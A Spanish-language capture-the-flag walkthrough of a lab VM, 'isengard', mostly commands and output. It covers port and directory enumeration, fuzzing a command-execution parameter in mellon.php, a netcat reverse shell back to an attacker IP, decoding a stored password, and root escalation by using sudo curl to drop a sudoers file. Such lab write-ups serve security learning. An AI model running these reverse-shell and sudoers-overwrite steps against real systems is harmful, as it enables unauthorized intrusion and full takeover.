Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.137
❯ nmap -sCV -p80 -oN 02-targeted.txt 192.168.1.137
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-15 20:41 -04
Nmap scan report for 192.168.1.137
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Gray wizard
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.67 secondsEl sitio muestra un mensaje en tengwar. Al final de main.css hay una pista:
/* btw: in the robots.txt i have to put the url /y0ush4lln0tp4ss */Enumeramos ese subdirectorio:
❯ gobuster dir -u 'http://192.168.1.137/y0ush4lln0tp4ss' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/1.jpeg (Status: 200) [Size: 88602]
/2.jpg (Status: 200) [Size: 63526]
/3.jpg (Status: 200) [Size: 136974]
/east (Status: 200) [Size: 285]En /east hay otra pista y un mellon.php:
❯ curl http://192.168.1.137/y0ush4lln0tp4ss/east/
...
<!--
file to be added -> ring.zip
-->
...❯ gobuster dir -u 'http://192.168.1.137/y0ush4lln0tp4ss/east' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,gif,png,sql,sh,pdf -r
...
/mellon.php (Status: 200) [Size: 0]
...Fuzzeamos el parámetro de mellon.php y damos con frodo, que ejecuta comandos:
❯ ffuf -u 'http://192.168.1.137/y0ush4lln0tp4ss/east/mellon.php?FUZZ=ls' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/big.txt -fs 0
...
frodo [Status: 200, Size: 77, Words: 1, Lines: 7, Duration: 97ms]
...Lanzamos una reverse shell:
http://192.168.1.137/y0ush4lln0tp4ss/east/mellon.php?frodo=nc%20-e%20/bin/bash%20192.168.1.3%201234
❯ ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
whoami
www-dataEn un directorio muy anidado de /opt hay un ZIP con un ring.txt codificado en base64 doble:
❯ cat ring.txt
ZVZoTFRYYzFkM0JUUVhKTU1rTk1XQW89Cg==
❯ cat ring.txt | base64 -d | base64 -d
yXKMw5wpSArL2CLXCambiamos al usuario sauron con esa contraseña y obtenemos la primera flag:
www-data@isengard:/home$ su sauron
Password: yXKMw5wpSArL2CLX
sauron@isengard:/home$Revisamos sudo -l:
sauron@isengard:/tmp$ sudo -l
Matching Defaults entries for sauron on isengard:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sauron may run the following commands on isengard:
(ALL) /usr/bin/curlPodemos ejecutar curl como root, que permite escribir archivos. Creamos un fichero sudoers y lo colocamos en /etc/sudoers.d/:
sauron@isengard:/tmp$ echo 'sauron ALL=(ALL) NOPASSWD: ALL' > sudouser
sauron@isengard:/tmp$ sudo curl file:///tmp/sudouser -o /etc/sudoers.d/sauron
sauron@isengard:/tmp$ sudo -l
...
User sauron may run the following commands on isengard:
(ALL) /usr/bin/curl
(ALL) NOPASSWD: ALL
sauron@isengard:/tmp$ sudo bash
root@isengard:/tmp#Obtenemos nuestra flag.
Fin.